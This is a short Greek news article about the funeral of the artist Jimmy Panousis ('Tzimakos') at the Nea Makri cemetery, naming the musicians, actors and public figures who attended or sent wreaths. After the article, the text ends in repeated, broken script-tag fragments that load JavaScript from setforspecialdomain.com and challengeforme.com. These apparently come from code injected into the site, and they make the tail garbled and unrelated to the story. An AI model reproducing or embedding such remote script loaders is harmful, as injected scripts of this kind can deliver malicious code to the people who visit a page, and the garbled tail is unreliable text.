Συγκίνηση στο τελευταίο αντίο στον «Τζιμάκο»

to-teleutaio-antio-autin-tin-wra-ston-tzimako

Γνωστοί, φίλοι και συγγενείς λένε είπαν το τελευταίο αντίο στον αγαπημένο Τζίμη Πανούση, στο νεκροταφείο της Νέας Μάκρης. Ο δημοφιλής καλλιτέχνης εξέπνευσε καθ΄ οδόν προς το νοσοκομείο Ερυθρός Σταυρός το Σάββατο μετά από καρδιακό επεισόδιο που υπέστη στο σπίτι του. Ήταν 64 χρόνων και ο θάνατός του σκόρπισε θλίψη στον καλλιτεχνικό κόσμο και όχι μόνο.

Μεταξύ των ανθρώπων που βρέθηκαν στο νεκροταφείο για να αποχαιρετήσουν τον «Τζιμάκο» ήταν  ο συνθέτης Λαυρέντης Μαχαιρίτσας, ο Χριστόφορος Παπακαλιάτης, ο Φοίβος Δεληβοριάς, ο Γιάννης Γιοκαρίνης και ο Γιάννης Ζουγανέλης. Το «παρών» στην κηδεία έδωσε και ο Μανώλης Γλέζος,ενώ στεφάνια απέστειλαν, μεταξύ άλλων, ο πρόεδρος της Βουλής, Νίκος Βούτσης, η ΑΕΚ, της οποίας ο Τζίμης Πανούσης ήταν φίλαθλος, το Εθνικό Θέατρο και ο Λάκης Λαζόπουλος.

Δείτε τις πρώτες φωτογραφίες:

 

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>